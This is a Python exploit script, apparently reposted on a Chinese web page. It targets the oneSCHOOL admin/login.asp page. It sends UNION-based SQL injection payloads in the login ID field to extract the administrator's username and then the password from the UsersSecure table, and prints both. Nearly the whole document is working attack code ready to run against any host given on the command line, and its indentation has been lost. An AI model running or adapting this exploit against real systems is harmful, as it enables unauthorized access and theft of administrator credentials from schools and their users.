|
#!/usr/bin/python
#oneSCHOOL admin/login.asp SQL Injection explot (for all versions)
#by Guga360.
import urllib
from sys import argv
query = {'txtOperation':'Login','txtLoginID':"""
' union select min(LoginName),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from UsersSecure where LoginName>'a'--""",'txtPassword':'x','btnSubmit':'L+O+G+I+N+%3E%3E'}
queryx = urllib.urlencode(query)
if len(argv)<>2:
print """
**********
Usage:
oneSCHOOLxpl.py [host]
[+] Exploiting...
[+] User: admin
[+] Password: 123
*******************
"""
else:
try:
print '\n[+] Exploting...\n'
host = argv[1]
if host[0:7]<>'http://':
host = 'http://'+host
url = urllib.urlopen(host+'/admin/login.asp', queryx)
url = url.read()
url = url.split()
name = url.index('varchar')+2
name = url[name]
name = name.replace("'","")
print '[+] User: ' + name
query2 = query.copy()
query2['txtLoginID']="""' union select min(Password),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from UsersSecure where LoginName='"""+name+"""'--"""
query2 = urllib.urlencode(query2)
url = urllib.urlopen(host+'/admin/login.asp', query2)
url = url.read()
url = url.split()
passw = url.index('varchar')+2
passw = url[passw]
passw = passw.replace("'","")
print '[+] Pass: '+passw
except:
print '[+] Not vulnerable!'
|
| |
|
推荐
评论(0条)
